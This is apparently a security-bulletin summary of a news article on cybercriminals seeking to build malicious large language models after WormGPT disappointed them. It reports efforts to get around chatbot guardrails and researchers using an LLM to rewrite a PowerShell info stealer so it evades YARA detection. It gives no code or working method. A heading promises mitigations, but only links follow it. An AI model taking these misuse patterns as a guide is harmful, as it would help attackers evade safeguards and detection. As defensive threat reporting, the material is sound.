Hackers Developing Malicious LLMs After WormGPT Falls Flat
Summary: Link(s):
Researchers have noted that cybercriminals are increasingly interested in developing malicious large language models due to the limitations of existing tools like WormGPT. Ransomware and malware operators are also showing interest in this trend. The demand for AI talent has risen as previous tools like WormGPT failed to meet cybercriminals’ needs. Etay Maor, a senior director of security strategy at Cato Networks, highlighted discussions among hackers in underground forums. These discussions revolve around finding ways to exploit the guardrails implemented by AI-powered chatbots. For instance, Maor pointed out a case on Telegram where a Russian-speaking threat actor named Poena was actively recruiting AI and machine learning experts to collaborate on developing malicious LLM products.
This growing interest in custom malicious LLMs isn't limited to a specific group of cybercriminals. Ransomware and malware operators are also showing a keen interest in this emerging trend. The surge in demand for AI talent can be attributed to the disappointment experienced with existing custom tools advertised in underground markets, which failed to deliver the desired functionalities to threat actors.
A report by Recorded Future published on March 19 delves deeper into how threat actors are leveraging generative AI techniques to craft malware and exploits. The report identifies four primary malicious use cases for AI, including evading detection tools commonly used by LLM applications through techniques like YARA rules. It showcases a practical example of researchers altering SteelHook, a PowerShell info stealer used by APT28, to bypass detection by prompting an LLM system to modify the malware's source code dynamically.
Security Officer Comments:
Recorded Future also sheds light on the potential use of multi-model AI by advanced nation-state actors. This involves sorting through vast amounts of intelligence data to identify vulnerabilities in critical systems such as industrial control systems (ICS). However, it's noted that access to such high-power computing resources remains a significant challenge for lower-tier threat actors, limiting their operations to activities like creating phishing emails.
Suggested Corrections:
Researchers at Recorded Future recommend the following mitigations to effectively counter AI-generated polymorphic strains developed by threat actors:
https://www.databreachtoday.com/hackers-developing-malicious-llms-after-wormgpt-falls-flat-a-24724
https://www.recordedfuture.com/adversarial-intelligence-red-teaming-malicious-use-cases-ai